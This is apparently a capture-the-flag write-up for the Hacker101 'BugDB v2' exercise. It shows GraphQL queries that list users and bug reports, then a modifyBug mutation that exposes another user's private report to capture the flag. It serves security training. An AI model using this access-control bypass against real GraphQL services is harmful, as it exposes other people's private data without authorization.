ctf.hacker101 — BugDB v2
We are starting our exercise with GO option at the end of the exercise title on https://ctf.hacker101.com/ctf
There is an empty GraphQL screen to solve the exercise and we read the “DOCS” files step by step on the right side of the exercise.
We start to write our own query with a unique name. Of course, there is no result for our query beacuse of it is empty.
query tumkullanicilar{
}In the reference files, we have a lots of fields to select. We choose the “allUsers” to find all users information.
Under “allUsers” tab we have “UserConnection” section and continue with “UserConnection”, know we have “pageInfo: PageInfo!” which is related to pagination and “edges: [UsersEdge]!” which has nodes for another information.
And we select the “node: Users” because we think that it could be related with users information.
Finally, our query looks like
query tumkullanicilar{
allUsers{
edges{
node{
id:username
}
}
}
}And the result is
{
"data": {
"allUsers": {
"edges": [
{
"node": {
"id": "admin"
}
},
{
"node": {
"id": "victim"
}
}
]
}
}
}But there is no any information what we are looking for so that we changed the query and start a new query with “allBugs: [Bugs]”
And our new query is
query tumraporlar{
allBugs{
reporter{
id:username
}
private
text
reporterId
}
}And the result is
{
"data": {
"allBugs": [
{
"reporter": {
"id": "admin"
},
"private": false,
"text": "This is an example bug",
"reporterId": 1
},
]
}
}There is just an “admin” result so that we are looking for a result for “victim”. At the beginning, we saw “mutation”[1] query and we try to get a result for “victim”
And our new query is
mutation victimrapor{
modifyBug(id:2,private:false){
ok
}
}And the result is
{
"data": {
"modifyBug": {
"ok": true
}
}
}Finally, we rerun the “tumraporlar” query.
RESULT: The flag was captured.
REFERENCES
[1] GraphQL Queries and Mutations, https://graphql.org/learn/queries/
